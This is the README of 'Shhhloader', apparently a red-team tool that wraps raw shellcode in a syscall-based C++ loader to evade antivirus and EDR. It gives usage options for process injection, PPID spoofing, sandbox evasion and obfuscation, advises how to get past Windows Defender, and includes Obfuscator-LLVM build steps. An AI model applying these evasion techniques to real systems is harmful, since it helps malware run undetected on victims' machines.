p65c/Shhhloader

Syscall Shellcode Loader (Work in Progress)

Shhhloader

Shhhloader is a SysWhispers/GetSyscallStub Shellcode Loader that is currently a Work in Progress. It takes raw shellcode as input and compiles a C++ stub that uses syscalls to try and bypass AV/EDR. The included python builder will work on any Linux system that has Mingw-w64 installed.

8/9/22 EDIT: Some BIG updates have been made! New major features include: GetSyscallStub integration, Obfuscator-LLVM support, Module Stomping, automatic DLL Proxy generation, new sandbox evasion methods, and storing shellcode as an English word array. Big shout out to @Snovvcrash, @spotheplanet, @_RastaMouse, and @Cerbersec whose code I used as a reference for this tool.

┳┻|
┻┳|
┳┻|
┻┳|
┳┻| _
┻┳| •.•)  - Shhhhh, AV might hear us! 
┳┻|⊂ﾉ   
┻┳|
usage: Shhhloader.py [-h] [-p explorer.exe] [-m QueueUserAPC] [-w] [-nr] [-ns] [-np] [-l] [-g] [-v] [-d] [-dp apphelp.dll]
                     [-s domain] [-sa testlab.local] [-o a.exe]
                     file

ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER

positional arguments:
  file                  File containing raw shellcode

optional arguments:
  -h, --help            show this help message and exit
  -p explorer.exe, --process explorer.exe
                        Process to inject into (Default: explorer.exe)
  -m QueueUserAPC, --method QueueUserAPC
                        Method for shellcode execution (Options: ModuleStomping, QueueUserAPC, ProcessHollow,
                        EnumDisplayMonitors, RemoteThreadContext, RemoteThreadSuspended, CurrentThread) (Default: QueueUserAPC)
  -w, --word-encode     Save shellcode in stub as array of English words
  -nr, --no-randomize   Disable syscall name randomization
  -ns, --no-sandbox     Disable sandbox checks
  -np, --no-ppid-spoof  Disable PPID spoofing
  -l, --llvm-obfuscator
                        Use Obfuscator-LLVM to compile stub
  -g, --get-syscallstub
                        Use GetSyscallStub instead of SysWhispers2
  -v, --verbose         Enable debugging messages upon execution
  -d, --dll             Generate a DLL instead of EXE
  -dp apphelp.dll, --dll-proxy apphelp.dll
                        Create Proxy DLL using supplied legitimate DLL (File must exist in current dir)
  -s domain, --sandbox domain
                        Sandbox evasion technique (Options: sleep, domain, hostname, username, dll) (Default: sleep)
  -sa testlab.local, --sandbox-arg testlab.local
                        Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
  -o a.exe, --outfile a.exe
                        Name of compiled file

Features:

• 7 Different Shellcode Execution Methods (ModuleStomping, QueueUserAPC, ProcessHollow, EnumDisplayMonitors, RemoteThreadContext, RemoteThreadSuspended, CurrentThread)
• PPID Spoofing
• Block 3rd Party DLLs
• GetSyscallStub & SysWhispers2
• Obfuscator-LLVM (OLLVM) Support
• Automatic DLL Proxy Generation
• Syscall Name Randomization
• Store Shellcode as English Word Array
• XOR Encryption with Dynamic Key Generation
• Sandbox Evasion via Loaded DLL, Domain, User, Hostname, and System Enumeration

See below video demonstrating the Module Stomping shellcode injection technique executed via DLL Proxying with Windows Defender fully enabled. As seen in the video, the Obfuscator-LLVM and English word list options were also utilized to help evade detection:

Shhhloader_Module_Stomping_DLL_Proxying.mp4

Known Issues:

• The Module Stomping method does not currently work with most stageless payloads. I believe this is due to a size limitation resulting from my shitty code or the DLL/function I am executing the shellcode in. For larger shellcode I recommend you use either the QueueUserAPC or RemoteThreadContext shellcode injection methods.
• Windows Defender will detect most files generated by this tool, so please do not post an issue saying "DETECTED!!!". Play around with the new options and features until you get something that works; they were added for a reason :). Executing the generated file in memory is also a good way to evade these detections.
• I'm sure there are a ton of bugs in my code. Please test everything in advance before using for something important, and PLEASE provide as much information as possible when opening an issue. (THANKS!)

OPTIONAL: To use the Obfuscator-LLVM flag, you must have it installed on your system alongside wclang. I've found this to be a bit of a pain but you should be able to do it with a little perseverance. Here's a step-by-step that I used to install the llvm-13.x branch of OLLVM on my Kali Linux system:

# Clone and Run CMake
git clone -b llvm-13.x https://github.com/heroims/obfuscator.git
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DLLVM_ENABLE_NEW_PASS_MANAGER=OFF ../obfuscator/llvm/

# Configure CMake and Compile OLLVM
export clang_build_dir=$(cd ../; pwd)/obfuscator/clang
sed -i 's/LLVM_TOOL_CLANG_BUILD:BOOL=OFF/LLVM_TOOL_CLANG_BUILD:BOOL=ON/g' CMakeCache.txt
sed -i "s|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=|LLVM_EXTERNAL_CLANG_SOURCE_DIR:PATH=$clang_build_dir|g" CMakeCache.txt
make -j7

# ONCE COMPILED, BACKUP ORIGINAL CLANG BINARIES
mv /usr/bin/clang /usr/bin/clang13.0.1
mv /usr/bin/clang++ /usr/bin/clang++13.0.1

# Then in OLLVM build/bin dir, copy the newly build clang bins
cp bin/clang /usr/bin/clang
cp bin/clang++ /usr/bin/clang++

# Then install wclang
cd ..
git clone https://github.com/tpoechtrager/wclang.git
cd wclang/
cmake -DCMAKE_INSTALL_PREFIX=_prefix_ .
make
make install
export wclang_path=$(pwd)/_prefix_/bin
echo "export PATH=$wclang_path:$PATH" >> ~/.bashrc
export PATH=$wclang_path:$PATH

# Then backup original lib files
cp -R /lib/llvm-13/lib/clang/13.0.1/include/ /lib/llvm-13/lib/clang/13.0.1/include_backup/

# Finally in the OLLVM build/bin/lib/clang/13.0.1/ dir, copy the include folder
cd ../build/lib/clang/13.0.1/
cp -R include/ /lib/llvm-13/lib/clang/13.0.1/

There is probably a better way to do this but this is what worked for me. If you have issues, just keep trying and ensure that you can run x86_64-w64-mingw32-clang -v and it contains either "Obfuscator-LLVM" or "heroims" in the output. Unfortunately I do not have the time to assist individuals who may need more help, but you can try reading this issue on my Nimcrypt2 repo where a couple of users figured out how to do it on their systems.

Greetz & Credit:

• @Jackson_T for his amazing project SysWhispers: https://github.com/jthuraisamy/SysWhispers
• @FalconForceTeam for their syscall generation tool that supports SysWhispers2: https://github.com/FalconForceTeam/SysWhispers2BOF
• @snovvcrash for their DInjector project, which I used as a template for many of the included injection techniques: https://github.com/snovvcrash/DInjector
• @Cerbersec for their Ares project, whose code I used for PPID Spoofing, Blocking 3rd Party DLLs and Sandbox Evasion: https://github.com/Cerbersec/Ares
• @spotheplanet for their blog post on Retrieving ntdll Syscall Stubs from Disk at Run-time: https://www.ired.team/offensive-security/defense-evasion/retrieving-ntdll-syscall-stubs-at-run-time
• @_RastaMouse for his code and article on Module Stomping which I ported to C++: https://offensivedefence.co.uk/posts/module-stomping/
• @s4ntiago_p for their NanoDump project and the randomize_sw2_seed.py script in particular: https://github.com/helpsystems/nanodump